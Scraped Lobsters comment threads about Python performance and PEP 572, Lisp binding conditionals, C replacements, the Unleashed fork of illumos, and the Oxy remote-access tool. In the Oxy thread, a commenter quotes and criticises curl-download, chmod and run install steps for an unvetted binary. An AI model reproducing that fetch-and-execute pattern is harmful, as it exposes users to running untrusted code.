                                                            Yes to all of the above. But not understanding where all the personal hostility is coming from. Apparently having the opinion that “Should := be part of Python” is much less important than “Let’s put our energies towards getting rid of the GIL and creating a kickass implementation that rivals C++” raises hackles. I am amused, entertained but still puzzled at all the energy.

                                                            1. 5

                                                              There was annoyance in my tone, and that’s because I’m a Python fan, and listening to people kvetch endlessly about how Python should be something it isn’t gets Ooooold when you’ve been listening to it for year upon year.

                                                              I’d argue that in order to achieve perf that rivals C++ Python would need to become something it’s not. I’d argue that if you need C++ perf you should use C++ or better Rust. Python operates at a very high level of abstraction which incurs some performance penalties. Full stop.

                                                              1. 5

                                                                This is an interesting, and puzzling, attitude.

                                                                One of the fun things about Cython was watching how the C++ code generated approaches “bare metal” as you add more and more type hints. Not clear at all to me why Python cannot become something like Typed Racket, or LISP with types (I forget what that is called) that elegantly sheds dynamism and gets closer to the metal the more type information it gets.

                                                                Haskell is a high level language that compiles down to very efficient code (barring laziness and thunks and so on).

                                                                Yes, I find this defense of the slowness of Python (not just you but by all commentators here) and the articulation that I, as one simple, humble user, should just shut up and go away kind of interesting.

                                                                I suspect that it is a biased sample, based on who visits this post after seeing the words “Guido van Rossum”

                                                                1. 8

                                                                  My hypothesis is that people who want performance are minority among Python users. I contributed to both PyPy and Pyston. Most Python users don’t seem interested about either.

                                                                  1. 3

                                                                    For me that has been the most insightful comment here. I guess the vast majority of users employ it as glue code for fast components, or many other things that don’t need performance. Thanks for working on pypy. Pyston I never checked out.

                                                                  2. 5

                                                                    Not clear at all to me why Python can not become something like Typed Racket, or LISP with types (I forget what that is called) that elegantly sheds dynamism and gets closer to the metal the more type information it gets.

                                                                    Isn’t that what mypy is attempting to do? I’ve not been following Python for years now, so really have no horse in this race. However, I will say that the number of people, and domains represented in the Python community is staggering. Evolving the language, while keeping everyone happy enough to continue investing in it is a pretty amazing endeavor.

                                                                    I’ll also point out that Python has a process for suggesting improvements, and many of the core contributors are approachable. You might be better off expressing your (valid as far as I can see) concerns with them, but you might also approach this (if you care deeply about it) by taking on some of the work to improve performance yourself. There’s no better way to convince people that an idea is good, or valid than to show them results.

                                                                    1. 4

                                                                      Not really. Mypy’s goal is to promote type safety as a way to increase program correctness and reduce complexity in large systems.

                                                                      It doesn’t benefit performance at all as near as I can tell, at least not in its current incarnation.

                                                                      Cython DOES in fact do this, but the types you hint with there are C types.

                                                                      1. 2

                                                                        Ah, I thought maybe MyPy actually could do some transformation of the code, based on its understanding, but it appears to describe itself as a “linter on steroids,” implying that it only looks at your code in a separate phase before you run it.

                                                                        Typed Racket has some ability to optimize code, but it’s not nearly as sophisticated as other statically typed languages.

                                                                      2. 3

                                                                        Be aware that even Typed Racket still has performance and usability issues in certain use cases. The larger your codebase, the larger the chance you will run into them. The ultimate viability of gradual typing is still an open question.

                                                                      3. 3

                                                                        In no way did I imply that you should “shut up and go away”.

                                                                        What I want is for people who make comments about Python’s speed to be aware of the alternatives, understand the trade-offs, and generally be mindful of what they’re asking for.

                                                                        I may have made some false assumptions in your case, and for that I apologize. I should have known that this community generally attracts people who have more going on than is the norm (and the norm is unthinking end users posting WHY MY CODE SO SLOW?).

                                                                        1. 2

                                                                          Hey, no problem! I’m just amused at the whole tone of this set of threads set by the original response (not yours) to my comment, lecturing me on a variety of things. I had no idea that (and can’t fathom why) my brief comment regarding prioritization decisions of a project would be taken so personally and raise so much bile. What I’m saying is also not so controversial - big public projects have a tendency to veer into big arguments over little details while huge gaps in use cases remain. I saw this particular PEP argument as a hilarious illustration of this phenomenon in how Python is being run.

                                                                          1. 3

                                                                            Thinking about this a little more - sometimes, when languages ‘evolve’ I feel like they forget themselves. What makes this language compelling for vast numbers of programmers? What’s the appeal?

                                                                            In Python’s case, there are several, but two for sure are a super shallow learning curve, and its tendency towards ‘un-clever’ syntax.

                                                                            I worry that by morphing into something else that’s more to your liking for performance reasons, those first two tenets will get lost in the shuffle, and Python will lose its appeal for the vast majority of us who are just fine with Python’s speed as is.

                                                                            1. 1

                                                                              Yes, though we must also remember that as users of Python, invested in it as a user interface for our code ideas, we are resistant to any change. Languages may lose themselves, but changes are sometimes hugely for the better. And it can be hard to predict.

                                                                              In Python’s 2.x period, what we now consider key features of the language, like list comprehensions and generator expressions and generators, were “evolved” over a base language that lacked those features altogether, and conservatives in the community were doubtful they’d get much use or have much positive impact on code. Likewise for the class/type system “unification” before that. Python has had a remarkable evolutionary approach over its long 3-decade life, and will continue to do so even post-GvR. That may be his true legacy.

                                                                  3. 1

                                                                    Heh. I think this is an example of the Lobste.rs rating system working as it should :) I posted an immoderate comment borne of an emotional response to a perfectly reasonable reply, and end up with a +1: +4 -2 troll, -1 incorrect :)

                                                                1. 1

                                                                  Merge with this?

                                                                  1. 1

                                                                    Better to just delete. My mistake.

                                                                  1. 1

                                                                    Related to anaphoric macros.

                                                                    I like the improved style vs. Graham’s implicit bindings, but for whatever reason binding conditionals in Lisp never gained traction. Perhaps they are just harder to read.

                                                                    1. 1

                                                                      These are (were?) super common in Clojure, fwiw. I can’t fathom a reason they’d be popular in Clojure, but not in Common Lisp, other than one having a Lisp-1 and a community that hates typing more characters than necessary… but in that case, the implied ‘it’ would be better….

                                                                      1. 1

                                                                        I can’t fathom a reason they’d be popular in Clojure, but not in Common Lisp

                                                                        They’re included in the Clojure standard library, but you have to write them yourself in CL (or use a library). That’s probably why.

                                                                        1. 1

                                                                          Right. The barrier to entry is far less in Clojure, but the idea of binding conditionals was not new in Clojure. So there was lots of opportunity for CL users to adopt it, and for it to end up in SBCL’s standard library, or be a quicklisp library away. That seems to have not happened.

                                                                    1. 5

                                                                      C matched the programming metaphors in UNIX because both occurred contemporaneously. That is why it was such a useful systems programming language, just as PL/1 did for MULTICS.

                                                                      If we evaluate systems programming languages against current need inside kernel/OS/utilities/libraries, won’t we come up short because the metaphors don’t match well anymore? Sure, we’ve stretched things with extensions to C, but that just makes C suffice for need, and no one will attempt to match metaphors to any new language because it’s shooting at TWO moving targets (the language and what it’s used for).

                                                                      Perhaps the success of C/UNIX derivatives forestalls their necessary concurrent replacement?

                                                                      1. 5

                                                                        After watching all the language wars play out, I started pushing the idea that a C replacement should keep its style and compatibility as much as possible. The same data types, calling conventions, automatic C FFI, extract to C for its compilers, whatever. Maybe close on the syntax like some competitors were. Then, on top of that, build something better without its shortcomings. Might be better module system, concurrency, macros, live coding a la Lisp/Smalltalk, and so on. It should be something that leverages the experience of those converting that plugs right into the ecosystem getting all its benefits. Plus, allows incremental rewrites of legacy codebases.

                                                                        Clay and Cyclone at least attempted something like this on safety side. I found another one that did on productivity side I’m submitting Sunday. I don’t see many attempts, though. Most take people far away from C model to then try to do something in a C model system.

                                                                        1. 4

                                                                          I’m keeping an eye on zig.

                                                                          1. 3

                                                                            D.

                                                                            1. 2

                                                                              That’s a quite reasonable concern. Share it as well. Because minimalism has a fundamental advantage in and of itself in composition.

                                                                              I think what replaces all of C (and all of UNIX) is in like manner such “composable minimalism”. But I’m not convinced that it will be “C like” or “UNIX like” at all, because the metaphors are an incomplete fit in this modern environment.

                                                                              I greatly enjoyed working in Python for its clarity and focus on writing concise and understandable code, but what with the PEP 572 that is compelling van Rossum to step down as Python BDFL, one can see the limits of how far that can be taken. (He’s very emotional about what I regard as an “overreach”.)

                                                                              I’ve been wrestling with Rust, attempting to rewrite my earlier kernel work in it in place of C, and it does have definite advantages. However, unlike C and Python, too much is “lost in translation” - code becomes obscure. Gets back to Ken Thompson’s comment in UNIX V5/6 “you are not expected to understand this” in doing his backwards coroutine context switch.

                                                                              So again we are at a crossroads - we might need a new metaphor, but not have it in sight yet.

                                                                              You want more low level hardware “involvement”, but wish to have the logic become more densely abstract to deal with complexity. You want greater “stop on a dime” debugging, but also “obviousness” in exposition to avoid much need for awkward comments. I’ve been thinking about AR/ML means to do augmented development as a means to bridging these, but we’ll see.

                                                                              1. 1

                                                                                Far as low-level Rust, you might find this work interesting given it’s about composing abstractions to deal with low-level stuff in embedded. The Tock people are also publishing interesting stuff. For now, I’m not sure if you were having problems due to the language itself, abstractions you were using, or some combination. Rust programmers are still in early exploration stage for that stuff.

                                                                                There’s also the possibility, which I encourage, of using safe/proven C or assembly for unsafe stuff with safe Rust for the rest that can support better abstraction. By safe/proven, I’m talking types like Cyclone/Clay or automated solvers like Frama-C/SPARK. Even if manual, there’s probably only a small amount of code we’d need specialists for. If doing generic components with reuse, then even that might be reduced. To be clear, I’m just brainstorming here based on all the reuse I’m seeing in Why3-based, CompCert-based and Myreen et al-based work.

                                                                                re AR/ML. I’ve been thinking of them for verification more than debugging. I just don’t have the depth required to know more past “attempt to apply the generic methods that work on everything to see what each accomplishes.” Monkey try thing, monkey see it work, monkey do more of that. That suggestion isn’t worth a Lobsters or IEEE submission, though. ;)

                                                                            1. 2

                                                                              Not sure why this was posted again so soon…

                                                                            1. 7

                                                                              So, I’ve been thinking that we really should have a wiki or book somewhere of standard business problems. Things like “this is a basic inventory system”, “this is basic user management”, and so forth, along with common design parameters and operating regimes.

                                                                              1. 1

                                                                                I really like this idea. One step more abstract: these are common parameters of a basic inventory system, here’s an implementation, and by the way here are some other tricky things that this toy system doesn’t solve. My concern with a wiki of implementations is that it would be easy for readers to turn off their brain. Including some “exercises for the reader” might help inform them of the problem space.

                                                                                1. 1

                                                                                  Yeah, a book really would be more ideal.

                                                                                  It’s also useful because it’s a good way of saying to a business “hey, you are business in wrong…why does our inventory system not follow normal practices?”

                                                                                  1. 1

                                                                                    Yeah, a book really would be more ideal.

                                                                                    My set of encyclopedias from 1989 says otherwise.

                                                                                    I worry that something like this implies that there’s only 1 correct way to do things, when that is often not true. And in fact, if it were, I don’t think we would have seen such explosive growth in our field…

                                                                              1. 4

                                                                                “Hooray! We have forked an already small community into yet another smaller community because…”

                                                                                Well, the “because” doesn’t really matter, even though they make extremely valid points! In an already incredibly fragmented community (how many derivatives of OpenSolaris does this make?) this makes the problem bigger…

                                                                                I don’t follow illumos very closely, but are there reasons that community won’t assist in pushing towards solving the concerns that sparked unleashed? Surely illumos is also an operating system that “developers want to use,” no?

                                                                                1. 10

                                                                                  As always, we’re happy to work with people who want to push changes to illumos-gate!

                                                                                  1. 5

                                                                                    xkcd 1095 seems relevant. :^)

                                                                                    1. 1

                                                                                      Yeah, maybe. :)

                                                                                    2. 4

                                                                                      If the illumos community were healthy I would agree with you and I wouldn’t have bothered to create this fork. Sadly, I think the illumos community has problems and the people that truly have a lot of say where the project goes either don’t see them or like the status quo.

                                                                                      Two years ago when I started Unleashed, I had a dilemma: should I fork illumos or ditch it for one of the BSDs. When I realized that there were other people that were just as unhappy with the (lack of) direction illumos had, making a fork sounded like a good option. That’s how we got here.

                                                                                      Now where do we go from here is an open question. It is completely possible that Unleashed will fizzle, at which point I can say that no real harm was done. The illumos community will remain as small as it was two days ago, with major contributors like Delphix bailing on illumos in favor of Linux. If Unleashed takes off and in the process kills off illumos, the overall ecosystem will be better off. There might be a person or two grumpy that they can’t run their emacs binary from 1994, but in my opinion that is a small price to pay.

                                                                                      Surely illumos is also an operating system that “developers want to use,” no?

                                                                                      That is the reason I considered and ultimately went with a fork instead of bailing on it. The technology in Solaris/OpenSolaris/illumos/Unleashed is great, and I didn’t want to give it up. I wanted to give up the hugely inefficient and ultimately counter-productive contribution process.

                                                                                      Happy hacking!

                                                                                      1. 4

                                                                                        Thanks for taking the time to respond. I know my post probably came off as aggressive, and if I’m honest, it was half intended to be. I think forks are very disruptive, and wish, of course, to minimize these sorts of things when at all possible.

                                                                                        When I realized that there were other people that were just as unhappy with the (lack of) direction illumos had, making a fork sounded like a good option.

                                                                                        This makes total and reasonable sense. I didn’t mean to imply that you hadn’t thought this through! And appreciate that you used it as a sort of last resort.

                                                                                        That is the reason I considered and ultimately went with a fork instead of bailing on it. The technology in Solaris/OpenSolaris/illumos/Unleashed is great, and I didn’t want to give it up. I wanted to give up the hugely inefficient and ultimately counter-productive contribution process.

                                                                                        Thanks for doing what you’re doing, and I wish Unleashed success (and maybe either domination or an eventual merge of the communities again)!

                                                                                        1. 3

                                                                                          Thanks for taking the time to respond.

                                                                                          No problem. I really had no choice - someone on the internet was “wrong” ;)

                                                                                          I know my post probably came off as aggressive, and if I’m honest, it was half intended to be.

                                                                                          The phrasing certainly made me go “urgh, not one of those…” but it sounds like we both agree that forks are disruptive; you think that it’s a negative thing while I think it is a positive thing. A reasonable difference of opinion.

                                                                                          Thanks for doing what you’re doing, and I wish Unleashed success (and maybe either domination or an eventual merge of the communities again)!

                                                                                          Thanks, that’s the idea :)

                                                                                          1. 2

                                                                                            The phrasing certainly made me go “urgh, not one of those…”

                                                                                            There’s really nothing I can offer as a legitimate excuse for that. I’m sorry.

                                                                                            but you think that it’s a negative thing while I think it is a positive thing. A reasonable difference of opinion.

                                                                                            The additional context you’ve provided makes me feel that it probably is the right, and positive choice in this case. I’m not vehemently against forks if there’s a legitimately good reason [and just to be clear, moving on from supporting legacy stuff is the important divergence I’m seeing, as it frees up resources to move faster]. I am against forks that don’t offer some radical divergence in philosophy, though. These are often rooted from deep bikeshedding on topics that don’t matter in the grand scheme of things.

                                                                                            Two examples of justified forks in my opinion: @rain1 recently forked filezilla because it was incorporating “unwanted extra nonfree software.” Devuan is a fork of Debian that replaces systemd – a topic that is far beyond bikeshedding at this point, as it’s had (and will continue to have) a drastic effect on the portability of software to other ecosystems.

                                                                                            1. 1

                                                                                              There’s really nothing I can offer as a legitimate excuse for that. I’m sorry.

                                                                                              No worries. Hopefully my initial response didn’t come across as too harsh either. If it did, my apologies.

                                                                                              I am against forks that don’t offer some radical divergence in philosophy, though.

                                                                                              Agreed. Although sometimes it is hard to tell if there is a justification for the fork.

                                                                                              1. 2

                                                                                                I am against forks that don’t offer some radical divergence in philosophy, though.

                                                                                                Agreed. Although sometimes it is hard to tell if there is a justification for the fork.

                                                                                                I wonder when we started to need a justification.

                                                                                                Why?

                                                                                                1. 11

                                                                                                  I wonder when we started to need a justification.

                                                                                                  You do you, man. You do you.

                                                                                                  In my mind, there are two types of forks we’re talking about. One of them is a “fork” on github, where I clone the repo, make some changes, contribute it back to the original author (or maybe not!), and live a happy life. These types of forks are almost always ok. It’s the “You do you, man. You do you.” response.

                                                                                                  The other “fork” is far more challenging, and far more likely to cause a rift in spacetime. Those are the large, and by all accounts, successful projects that as a result divide a community, and make it difficult for users and would-be contributors to find the right thing to use. These projects fork very publicly, and are rather uncomfortable, to be honest.

                                                                                                  In many cases, these forks occurred because egos were hurt (I wanted it yellow) – a social issue – not a technical issue. In other cases, there’s a large philosophical difference that impacts the general direction of the technology. This may be licensing, whether or not to support obscure platforms, a radical new idea or focus… etc. In all cases, even if there are legitimately great outcomes (OpenBSD comes to mind), there’s a period of confusion and frustration from users who are now forced to choose where to put their effort. They are forced into taking sides, and that’s unfair.

                                                                                                  1. 1

                                                                                                    These are marketing concerns. Market share issues, to be precise.

                                                                                                    They are valid for open source projects that are basically marketing tools, but they are pointless for free software that maximizes hackers’ freedom to hack.

                                                                                                    Feeling the need to justify a fork is the first step towards asking permission.
                                                                                                    The PATENTS file in projects like Fuchsia’s kernel sources just pushes for that.

                                                                                                    1. 5

                                                                                                      Sorry, my friend. Most people don’t share your principles on what a ‘hack,’ or a ‘hacker’ is. More often than not, the people using, and writing software care more about getting the job done quickly, and without frustration, and a fork makes that harder. It doesn’t matter how you classify it.

                                                                                                      1. 0

                                                                                                        people using, and writing software care more about getting the job done quickly, and without frustration

                                                                                                        And this is fine!

                                                                                                        But, my friend, you need to understand the tools you use!
                                                                                                        If you pick up free software that is distributed “WITHOUT ANY WARRANTY” just because it’s free of charge, and you completely miss the culture of the people who develop it, you won’t get your job done. Same if you pick open source software controlled by Google (or whoever) and you fork it to successfully challenge their market share.

                                                                                                        In both cases, you’ll face surprises, unexpected costs and frustration.

                                                                                                        Understanding the environment you operate in is strategic to “get the job done”.

                                                                                                        Most people don’t share your principles on what a ‘hack,’ or a ‘hacker’ is.

                                                                                                        Interesting! Do you have world-wide statistics to prove such a claim?

                                                                                                        Not that it matters: “principles” stand to “artifacts” like “postulates” stand to “theorems”. How many people accept the postulates/principles is irrelevant.

                                                                                                        I know that some people don’t share my principles. And I’m fine with it.
                                                                                                        Do you know that some people don’t share your principles?
                                                                                                        Are you fine with it?

                                                                                                        1. 2

                                                                                                          But, my friend, you need to understand the tools you use! If you pick up free software that is distributed “WITHOUT ANY WARRANTY” just because it’s free of charge, and you completely miss the culture of the people who develop it, you won’t get your job done. Same if you pick open source software controlled by Google (or whoever) and you fork it to successfully challenge their market share.

                                                                                                          In both cases, you’ll face surprises, unexpected costs and frustration

                                                                                                          I read this several times and can’t figure out what you’re saying.

                                                                                                          Why do I need to understand the culture of a tool I use? As long as it fulfills my technical needs and I know what I’m prohibited from doing by law, I can use it to get my job done.

                                                                                                          1. 1

                                                                                                            Why do I need to understand the culture of a tool I use?

                                                                                                            Some examples of the issues you might face:

                                                                                                            • a security update could be delayed
                                                                                                            • an update upstream could break your work in production
                                                                                                            • you (or one of your customers) could be sued for patent violation (even if you are not actually violating it)
                                                                                                            • the project might contain backdoors and your image could be associated with it

                                                                                                            and so on…

                                                                                                            You could ignore the culture of tools you get for free, and be lucky.
                                                                                                            But in my job, I would call that short-sighted and unprofessional.

                                                                                                            Software is not like a hammer: even if you take it free of charge, there are strings attached.

                                                                                                            1. 2

                                                                                                              Some examples of the issues you might face…

                                                                                                              There are ways around much of these concerns. I have a support contract, or trust in a distribution (say, Canonical for Ubuntu or Red Hat), which provides vuln disclosures, and updates for me to apply. I have a development process that includes QA, and automated CI infrastructure so that breaking changes are caught before production… etc.

                                                                                                              But, to the meta point:

                                                                                                              But, my friend, you need to understand the tools you use!

                                                                                                              Demonstrably this is not at all true. It’s easy to do a survey of 100 people – 10 people even, and ask them if they understand their tools. How are their tools implemented? How does the relational database they store and query data into/from store data on disk? How does the map type work in their favorite language? How does the VM work? How does the ORM work? How does the templating language they use work? How does the image processing library they use work to resize images, or rotate images, or whatever work? How does TensorFlow do all it does?

                                                                                                              What you’ll find is that a large portion of engineers have no idea how things work. And they don’t need to know. Their job is to build CRUD apps for people who could care less if something takes a little bit longer. The developer themselves, in many cases, could care less about BTREE indexes vs. HASH indexes, and doesn’t really know the difference. For the amount of data they manipulate, doing full table scans 3 times an hour (because they literally have 3 queries an hour) is completely sane, reasonable, and still puts a smile on the face of the Administrative assistant who no longer has to go to a typewriter to type out a bunch of labels. Or, who no longer has to print 10,000 college applications to give to admissions reviewers… or any number of other tasks where even the worst technology choices, recommended by underskilled developers can make a ginormous (and) positive difference on the process.

                                                                                                              1. 0

                                                                                                                There are ways around much of these concerns.

                                                                                                                Sure, but the simplest one is to understand the tools you use.

                                                                                                                And actually, trusting Debian (or OpenBSD or whatever) or signing a support contract with Canonical (or Red Hat or Microsoft or whatever) requires the cultural understanding of such people I was talking about.

                                                                                                                Demonstrably this is not at all true. […]
                                                                                                                …even the worst technology choices, recommended by underskilled developers can make a ginormous (and) positive difference on the process.

                                                                                                                Practically you are saying: “everyone can become rich without working: just win the lottery!”. Well, this is not false. Stick to boring low-hanging fruit all your life and you will never face the issues that a professional developer has to consider every day.

                                                                                                                What you describe is not to “get the job done”.
                                                                                                                People die because of people who work this way.

                                                                                                                In Italy we say: “even a broken clock can be right twice a day”.
                                                                                                                Yes, incompetent developers can occasionally improve the life of someone, but most of the time, they just mess things up beyond repair.

                                                                                                                1. 4

                                                                                                                  Practically you are saying: “everyone can become rich without working: just win the lottery!”. Well, this is not false. Stick to boring low-hanging fruit all your life and you will never face the issues that a professional developer has to consider every day.

                                                                                                                  What you describe is not to “get the job done”. People die because of people who work this way.

                                                                                                                  I believe this comment really lacks perspective. What you are saying is that the Shamar style of development is the only correct style of development and anyone not doing it that way is not only doing it wrong but putting people’s lives at risk.

                                                                                                                  The industry I work in produces a lot of software and consumes a lot of software, however no company in this industry would consider itself a tech company. We have people whose job title is “Software Engineer”. But, for the most part, they make pretty bad technical decisions and are fairly unskilled relative to the engineers at most tech companies. But, they aren’t “trying to get rich without working” or “win the lottery”. They are very hard working. The industry just has a different set of values where the software is incidental to the actual problem the company is solving. A lot of the things you brought up in an earlier post about why one needs to understand the culture of the software they consume don’t actually apply in the industry I’m in. Security updates and backdoors are almost never going to be a concern because these systems are not open to the outside. The data they consume is entirely generated and processed inside the walls of the company. In the industry I’m in, we’re actually saving lives too! I mean that literally.

                                                                                                                  I hate to use this word, but your comment is elitist. Anyone not solving problems how you say is not a professional and just causing damage “beyond repair”. Your comment lacks humility and perspective yet is extremely assertive. It might be worth stepping back and questioning if what you assert so strongly is an ideal, a belief, or reality. Or perhaps it’s a challenge with the language and you don’t realize how assertive your comments sound relative to how assertive you meant them to be. But insisting people not following your development principles are killing people is a pretty strong statement, in any case.

                                                                                                                  1. 0

                                                                                                                    But insisting people not following your development principles are killing people is a pretty strong statement, in any case.

                                                                                                                    I was not talking about software development in particular.

                                                                                                                    Incompetent engineers build bridges that fall down.
                                                                                                                    Incompetent physicians do not cure mortal diseases properly. And so on.
                                                                                                                    They can get some work done, but it’s luck, like winning the lottery.

                                                                                                                    As for software, I do not mean that a competent software developer cannot adopt a cheap half-working solution instead of an expensive “right” one (whatever that means in the context).

                                                                                                                    On the contrary!
                                                                                                                    I mean that to make a choice you need competence.

                                                                                                                    I’m saying that only a competent professional who knows the tools she uses can really “get the job done”.
                                                                                                                    An incompetent one can be lucky some times, but you cannot trust her products and thus the job is not done.

                                                                                                                    Or perhaps it’s a challenge with the language

                                                                                                                    Actually, I’m rather surprised by the opposition such a simple and obvious concept is facing. All other craftsmen I know (the real ones, not the software ones) agree that it takes years to “own” their tools.

                                                                                                                    Probably we have diverged too much from the original topic, and we are facing a deep cultural mismatch.

                                                                                                                    In Europe (which, let me say, is not living up to its own values these days) we are used to being very diverse and inclusive (note: it took centuries of wars, rapes, debates, commerce, poetry, science, curiosity and many other contaminations to get here).

                                                                                                                    But we do not meld the meaning of words just to include more people.

                                                                                                                    We clearly see and state the differences, and happily talk about them.

                                                                                                                    And this is not elitism, it’s efficient communication.

                                                                                                                    When we say “job” or “done” we convey a precise message.
                                                                                                                    And if a bridge falls down and kills someone, we call the engineers who built it liars because the job was not done. At times they even stop being called engineers at all.

                                                                                                                    1. 2

                                                                                                                      You don’t give an inch, do you? I’ve explicitly said that I work in an industry that does not do software development like you have expressed it should be done and your response is to keep on insisting on it. On top of that, you did this annoying thing where this discussion has clearly been about software development but when I pushed back you move the goal post and start talking about bridges and medicine. It’s extremely challenging and frustrating to communicate with you, I need to work on not doing that. Thanks for the discussion, it was insightful for myself.

                                                                                                                  2. 3

                                                                                                                    Looks like someone got a degree in being right on the Internet! There’s no point in engaging with you, and if there was a feature to block users, I would make use of it.

                                                                                                                    1. 0

                                                                                                                      I’m sorry about this.

                                                                                                                      If you lack arguments to support your assumptions, I can suggest simply stating such assumptions clearly. For example:

                                                                                                                      Users and companies are entitled to get work and value from software developers for free, because they are in a rush to get their job done.
                                                                                                                      FS and OSS forks hurt this right.

                                                                                                                      I would deeply disagree on such premise.
                                                                                                                      But I wouldn’t argue against the conclusions.

                                                                                                                      1. 2

                                                                                                                        Did you just tell me to go fuck myself?

                                                                                                                        1. 1

                                                                                                                          Ok, this must really be a language problem.

                                                                                                                          I cannot find a translation of what I wrote that can be interpreted that way!

                                                                                                                          Anyway: No, I’m not telling you to fuck yourself.

                                                                                                                          1. 2

                                                                                                                            I just spent 30 minutes carefully crafting a response to your absurd notion that everyone must be highly skilled or people will die. But, it’s just not worth it. You’ll find a way to twist it into something it’s not, and yell loudly about how I’m wrong without considering that you may be shortsighted in your assumptions.

                                                                                                                            1. 0

                                                                                                                              I’m sorry for the time you wasted.

                                                                                                                              I do not think that “everyone must be highly skilled or people will die”.

                                                                                                                              I think that everyone should be professional in his own job.
                                                                                                                              Which, at the bare minimum, means understanding the tools you use.

                                                                                                                              you may be shortsighted in your assumptions.

                                                                                                                              I wouldn’t even engage if I would not assume this to be possible: there would be nothing to learn.

                                                                                          2. 3

                                                                                            Question that I have that isn’t clear from the post. Do you intend to maintain enough compat with Illumos that you would be able to get improvements that were done in something like SmartOS? Are you planning on continuing to pull changes from Illumos? Planning to try contributing changes back? Or is this a hard fork where you don’t imagine there would be cross pollination?

                                                                                            1. 4

                                                                                              Good questions!

                                                                                              1. Source-level compat, yes until it stops making sense. Binary compat, no.
                                                                                              2. I’ll continue git-pull from illumos-gate until it starts to be too cumbersome due to divergence. Once that happens, I’ll probably still take commits from illumos-gate but I’ll be more selective. In addition to illumos-gate, we cherry-pick changes from the illumos downstreams (omnios, illumos-joyent, etc.). This is open source, if those repos have good changes I’d be stupid not to take them because they were authored “outside”.
                                                                                              3. I have no plan to get changes back into illumos, however the code is open so others can do it. As an example, Toomas Soome took one of the cleanups in Unleashed and got it into illumos-gate (87bdc12930bfa66277c45510e399f8a01e06c376). He also has a work-in-progress to get our cpio-based boot_archives into illumos, but I don’t know the status of that.

                                                                                              Hopefully I covered everything.

                                                                                        1. 14

                                                                                          Yeah…. OK.

                                                                                          curl -O https://oxy-secure.app/oxy
                                                                                          chmod +x oxy
                                                                                          ./oxy --help
                                                                                          

                                                                                          I know this practice has, again and again, been discussed to various levels of “this is no different than your package manager over HTTPS.”

                                                                                          But, this is shocking: “trust the security of your network to a brand new protocol implemented in this convenient, 3 command installable, binary. Be sure to download it as root, just for good measure. What do you have to lose?”

                                                                                          1. 6

                                                                                            I upvoted you, and then looked closer realizing that they aren’t asking people to run a bash script from the Internet. Perhaps you misread, as I did, what the instructions were saying?

                                                                                            It’s basically standard practice for people to download compiled binaries from the Internet and run them (certainly on Windows and macOS). curl is not being run as root. And just below those instructions are compile-your-own binary instructions, for those who would rather compile it themselves:

                                                                                            cargo install --git https://github.com/oxy-secure/oxy
                                                                                            ~/.cargo/bin/oxy --help
                                                                                            

                                                                                            Which, incidentally, has the exact same trust assumptions (X.509) as the downloaded binary.

                                                                                            1. 5

                                                                                              they aren’t asking people to run a bash script from the Internet.

                                                                                              No. What they’re doing is kind of worse. Instead of telling you to download and run a bash script from the internet, (which you could reasonably inspect first), they’re telling you to run a binary that obscures the fact that it’s doing something malicious.

                                                                                              And, sure, you can cargo install it after auditing the source, but can I be reasonably sure that the binary is derived from that source? No. I can’t. Assuming reproducible builds, I could reproduce the build and compare a checksum, but that binary could have been created from a slightly different, and malicious source tree. When given the choice of downloading a recently compiled binary, and waiting 30 seconds for Rust to build it (with the cargo instructions), maybe I say, “eh, that’s OK, I’ll just take the pre-compiled one.” Social engineering at its finest! Tell people they can wait, or have it right now….

                                                                                              But, let’s assume that it’s “accepted practice” to download and run random binaries off of a mysterious website that doesn’t even list its authors… Maybe we should… I don’t know… stop doing that????

                                                                                              But, but, but, package servers are just protected by X.509, too! you say. Sure. The transport is protected by that. But, there’s also (usually) some level of trust associated with a package server. In the case of most distributions you’ve got signed packages. In the case of homebrew, you have the ability to choose where you get your formulae from, which has implications in the trust model. I don’t know much more about homebrew, but I assume they at least compare known checksums from the formulae to checksums of downloaded source tarballs?

                                                                                              https://secure.app/oxy was put on the internet by someone – looking at the commit history, https://github.com/jennamagius – whose discoverable online presence is: “Hi, I’m Jenna” (via https://jenna.app/ redirected from jennamagius.github.io). If that isn’t suspicious to you… god speed.

                                                                                              1. 2

                                                                                                I’ll double down on that, saying this is a remote access tool. Those are front doors for the good folks or backdoors for the bad folks depending on how they’re implemented or how much (if any) monitoring is happening. High-value target. One should only use a RAT that’s been thoroughly vetted by people that have a track record breaking bad protocols, crypto, etc. Actually, these are such necessary and risky tools that they’re among the few I think deserve all the assurance we can throw at them. All the way up to formal proof. Plus, ability for much independent verification.

                                                                                                Until multiple, independent assessments confirm quality/security, I’d ignore whatever the new RAT tool is to stick with OpenSSH or something with lots of review and use in the field. Those wanting improvements can enhance their code or UI piece by piece carefully testing and vetting the changes for now. For reliability, too, since more bugs will have been shaken out. Next worst thing to hackers getting in your system is you not getting in your own system due to immature software breaking. They tend to do it at worst times, too.

                                                                                                1. 1

                                                                                                  Also, I realize I didn’t really respond to your specific claim “… (certainly on Windows and macOS)”

                                                                                                  I don’t use Windows anymore – not in 18 years at this point. But, my understanding is that they are adopting a “store” model to combat this practice. The same with Apple and the Mac App Store. It’s true that you can still download and run random Apps on OS X, but you’re given plenty of warnings, and the practice is pretty discouraged by Apple.

                                                                                                  If for some reason someone like GitHub decides to not use the Mac App Store to distribute Atom, well, it’s perhaps the case that you trust GitHub to host and provide an untampered with binary, because you actually trust your other data to GitHub.

                                                                                                  1. 3

                                                                                                    I will reply to both of your replies here.

                                                                                                    So, you raised several concerns. Let’s go through them again.

                                                                                                    Be sure to download it as root, just for good measure.

                                                                                                    I pointed out the authors (whoever they are), never suggested you do this, and their instructions do not tell people to do that. So, that’s one down, let’s move on to the next concern.

                                                                                                    they’re telling you to run a binary that obscures the fact that it’s doing something malicious.

                                                                                                    This appears to be your other main concern, the basic idea of installing software not-from-source.

                                                                                                    This is a common practice on macOS, Windows, and Linux. I would venture to say that 99.99% of users do this.

                                                                                                    But, in a later comment, you bring up app stores:

                                                                                                    But, my understanding is that they are adopting a “store” model to combat this practice. The same with Apple and the Mac App Store. It’s true that you can still download and run random Apps on OS X, but you’re given plenty of warnings, and the practice is pretty discouraged by Apple.

                                                                                                    I will point out that your original comment, to which I was replying, never mentioned anything about being upset that oxy was not registered in an app store. Yes, you did mention package managers, but both app stores and package managers are known to distribute malware from time to time, and many of them come with differing trust assumptions (some worse than others).

                                                                                                    So a package manager or app store is no guarantee that the binary you’re installing is safe at all, and you’re back to square one with your trust assumptions.

                                                                                                    https://jenna.app/ redirected from jennamagius.github.io). If that isn’t suspicious to you… god speed.

